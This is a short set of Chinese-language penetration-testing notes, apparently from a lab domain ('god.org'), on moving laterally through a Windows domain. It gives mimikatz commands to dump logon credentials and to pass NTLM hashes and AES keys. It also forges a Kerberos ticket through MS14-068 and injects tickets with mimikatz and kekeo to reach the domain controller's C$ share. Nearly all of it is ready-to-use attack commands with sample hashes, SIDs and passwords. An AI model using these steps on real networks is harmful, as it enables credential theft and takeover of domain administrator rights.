PTH传递
先获取到域控这边的NTLM
执行命令
privilege::debug
sekurlsa::logonpasswords
然后在域内主机用mimikatz连接
sekurlsa::pth /user:administrator /domain:god /ntlm:ccef208c6485269c20db2cad21734fe7
c成功后会弹出一个新的cmd 直接在这里面连接域控就可以
PTK传递
如果打补丁的话就需要PTK
这个用到的比较少
sekurlsa::ekeys #获取 aes
sekurlsa::pth /user:mary /domain:god/aes256:d7c1d9310753a2f7f240e5b2701dc1e6177d16a6e40af3c5cdff814719821c4b
PTT票据传递
第一种方法 利用漏洞MS14-068 能实现普通用户直接获取域控 system 权限 但是这个漏洞比较老 基本见不到
先sid
whoami/user
然后用mimikatz清空机器中所有凭证 如果有域成员凭证会影响凭证伪造
kerberos::purge
查看一下当前机器凭证
利用 ms14-068 生成 TGT 数据
ms14-068.exe -u 域成员名@域名 -s sid -d 域控制器地址 -p 域成员密码
MS14-068.exe -u mary@god.org -s S-1-5-21-1218902331-2157346161-1782232778-1124 -d 192.168.3.21 -
p admin!@#45
4.票据注入内存
kerberos::ptc TGT_mary@god.org.ccache
利用
dir \\192.168.3.21\c$
利用工具 kekeo
1.生成票据
kekeo "tgt::ask /user:mary /domain:god.org /ntlm:518b98ad4178a53695dc997aa02d455c"
2.导入票据
kerberos::ptt TGT_mary@GOD.ORG_krbtgt~god.org@GOD.ORG.kirbi
还有就是K8的工具ladon
